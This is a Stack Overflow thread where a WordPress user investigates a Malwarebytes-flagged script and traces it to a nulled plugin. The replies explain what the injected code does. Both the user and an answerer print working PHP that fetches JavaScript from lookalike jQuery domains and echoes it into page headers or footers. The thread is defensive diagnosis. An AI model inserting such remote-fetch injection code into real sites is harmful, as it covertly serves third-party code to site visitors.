1

I am using Malware bytes and every time I visit my wordpress site it blocks a script trying to run on the page, the script is:

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it malicious or not but I would like to remove it, however I do not know which plugin or file is causing it, i've tried looking at page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

Tushar Gupta - curioustushar
  • 58,085
  • 24
  • 103
  • 107
tttwb
  • 23
  • 1
  • 4
  • 1
    Deactivate all your plugins, check the site and see if you are still getting an issue - if not, then activate your plugins one at a time and check (this will let you know which plugin it is) if you get an issue with all plugins deactivated, check your theme files. – Aravona Jun 18 '14 at 09:54
  • Okay, I've found the plugin, and this is the code in the plugin php `if(!function_exists('wp_func_jquery')) { function wp_func_jquery() { $host = 'http://'; $library = '/jquery-1.6.3.min.js'; echo(wp_remote_retrieve_body(wp_remote_get($host.'jquery'.'libs.org'.$library))); } if(rand(1,2) == 1) { add_action('wp_footer', 'wp_func_jquery'); } else { add_action('wp_head', 'wp_func_jquery'); } }` Any ideas what this is trying to do? – tttwb Jun 18 '14 at 10:04
  • Looks like it just adds a jQuery library to your wordpress, using a random number to place it on the header or the footer. What is the name / description of this plugin? – Aravona Jun 18 '14 at 10:12

2 Answers2

3

You are using a wordpress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer premium themes and plugins which normally cost 5$-75$ for free.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), either anyone logged in as admin or/and anyone without a referrer url is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing thereby fooling enough inexperienced Wordpress webmasters as something which belongs - jQuery. Official jQuery CDN is located here //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code which may also be inside image files though normally is inside init.php or functions.php. Here is another example of similar code using a different variation of jquery domain.

if(!function_exists('wp_func_jquery')) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
            if (@fopen($jquery,'r')){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
        }
        add_action('wp_footer', 'wp_func_jquery');
    }
NickNo
  • 872
  • 15
  • 32
0

You can search for this script in your wordpress directory using one of the applications proposed in this question: Tools to search for strings inside files without indexing.

Community
  • 1
  • 1
MarcinWolny
  • 1,600
  • 2
  • 27
  • 40
  • Click green tick box on a left side of my answer! ;) hehe – MarcinWolny Jun 18 '14 at 09:59
  • I don't have enough reputation apparently! I found the plugin and code as posted above, any idea what it is trying to do? – tttwb Jun 18 '14 at 10:08
  • It looks like it's trying to include jquery in some very wrong way from incorrect host. jquerylibs.org is a domain registered by some private individual, so pretty much anything might be there - from an actual jquery library (which isn't there) to malware or viruses (which ain't there either, but again: private domain, owner can put there whatever he wants whenever he wants). Just to be safe: remove it. – MarcinWolny Jun 18 '14 at 10:14